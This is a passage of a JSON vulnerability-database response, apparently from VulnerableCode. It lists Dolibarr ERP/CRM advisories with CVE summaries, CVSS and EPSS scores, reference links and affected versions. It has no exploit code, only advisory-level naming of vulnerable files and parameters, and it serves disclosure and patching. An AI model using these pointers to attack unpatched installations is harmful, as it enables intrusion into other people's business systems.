lities/60595?format=json","vulnerability_id":"VCID-ng17-k6q4-qfhe","summary":"Dolibarr SQL injection vulnerability in accountancy/customer/card.php\nA SQL injection vulnerability in accountancy/customer/card.php in Dolibarr 11.0.4 and below allows remote authenticated users to execute arbitrary SQL commands via the id parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14443","reference_id":"","reference_type":"","scores":[{"value":"0.00295","scoring_system":"epss","scoring_elements":"0.5306","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14443"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/40e16672e3aa4e9208ea7a4829f30507dcdfc4ba","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/40e16672e3aa4e9208ea7a4829f30507dcdfc4ba"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14443","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14443"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/75137?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8kn4-yfnc-sfaw"},{"vulnerability":"VCID-8q73-qf6x-zyde"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-ssn5-ht3p-3kgh"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4"},{"url":"http://public2.vulnerablecode.io/api/packages/100581?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14443","GHSA-8v7v-6mmm-xjxm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ng17-k6q4-qfhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49306?format=json","vulnerability_id":"VCID-q3dz-magb-4kd5","summary":"Access Control vulnerability in Dolibarr\nAn Access Control vulnerability exists in Dolibarr ERP/CRM 13.0.2, fixed version is 14.0.1, in the forgot-password function becuase the application allows email addresses as usernames, which can cause a Denial of Service.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37517","reference_id":"","reference_type":"","scores":[{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.58155","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37517"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/b57eb8284e830e30eefb26e3c5ede076ea24037c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/b57eb8284e830e30eefb26e3c5ede076ea24037c"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/14.0.1","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/14.0.1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37517","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37517"},{"reference_url":"https://github.com/advisories/GHSA-xw7v-qrhc-jjg2","reference_id":"GHSA-xw7v-qrhc-jjg2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xw7v-qrhc-jjg2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/85235?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1"}],"aliases":["CVE-2021-37517","GHSA-xw7v-qrhc-jjg2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q3dz-magb-4kd5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49784?format=json","vulnerability_id":"VCID-qdmw-vqe3-7kfk","summary":"Logic error in dolibarr\nThe application does not check the input of price number lead to Business Logic error through negative price amount.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0174","reference_id":"","reference_type":"","scores":[{"value":"0.00244","scoring_system":"epss","scoring_elements":"0.47797","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0174"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32"},{"reference_url":"https://huntr.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0174","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0174"},{"reference_url":"https://github.com/advisories/GHSA-8qvx-f5gf-g43v","reference_id":"GHSA-8qvx-f5gf-g43v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8qvx-f5gf-g43v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36973?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2022-0174","GHSA-8qvx-f5gf-g43v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qdmw-vqe3-7kfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50547?format=json","vulnerability_id":"VCID-rhud-xhwf-mqew","summary":"Improper Authorization in dolibarr/dolibarr\nDolibarr allows improper access control issues in the userphoto modulepart. The impact could lead to data exposure as the attached files and documents may contain sensitive information of relevant parties such as contacts, suppliers, invoices, orders, stocks, agenda, accounting and more.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0731","reference_id":"","reference_type":"","scores":[{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33106","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0731"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a"},{"reference_url":"https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0731","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0731"},{"reference_url":"https://github.com/advisories/GHSA-4xc7-x2jr-cr74","reference_id":"GHSA-4xc7-x2jr-cr74","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4xc7-x2jr-cr74"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86726?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5r6g-nb9m-43h1"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0731","GHSA-4xc7-x2jr-cr74"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rhud-xhwf-mqew"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/8686?format=json","vulnerability_id":"VCID-s6he-mw9s-nbba","summary":"Dolibarr ERP CRM Code Injection vulnerability during installation\nLack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted input.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29477","reference_id":"","reference_type":"","scores":[{"value":"0.00165","scoring_system":"epss","scoring_elements":"0.37227","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29477"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29477","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29477"},{"reference_url":"https://github.com/advisories/GHSA-p73x-rpgm-3v56","reference_id":"GHSA-p73x-rpgm-3v56","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p73x-rpgm-3v56"}],"fixed_packages":[],"aliases":["CVE-2024-29477","GHSA-p73x-rpgm-3v56"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s6he-mw9s-nbba"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/12695?format=json","vulnerability_id":"VCID-s6v7-8pq8-nyez","summary":"Improper Authorization in dolibarr/dolibarr\nAn Improper Authorization vulnerability exists in Dolibarr versions prior to version 15.0.0. A user with restricted permissions in the 'Reception' section is able to access specific reception details via direct URL access, bypassing the intended permission restrictions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3991","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16393","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-3991"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f"},{"reference_url":"https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/"}],"url":"https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3991","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-3991"},{"reference_url":"https://github.com/advisories/GHSA-wppr-j57c-8jpm","reference_id":"GHSA-wppr-j57c-8jpm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-wppr-j57c-8jpm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36973?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2021-3991","GHSA-wppr-j57c-8jpm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s6v7-8pq8-nyez"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56671?format=json","vulnerability_id":"VCID-s9rz-z4dd-rkhm","summary":"Incorrect Authorization in Dolibarr\ncore/get_menudiv.php in Dolibarr before 11.0.4 allows remote authenticated attackers to bypass intended access restrictions via a non-alphanumeric menu parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-12669","reference_id":"","reference_type":"","scores":[{"value":"0.00289","scoring_system":"epss","scoring_elements":"0.52542","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-12669"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/c1b530f58f6f01081ddbeaa2092ef308c3ec2727","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/c1b530f58f6f01081ddbeaa2092ef308c3ec2727"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-12669","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-12669"},{"reference_url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/11.0.4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/11.0.4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/75137?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-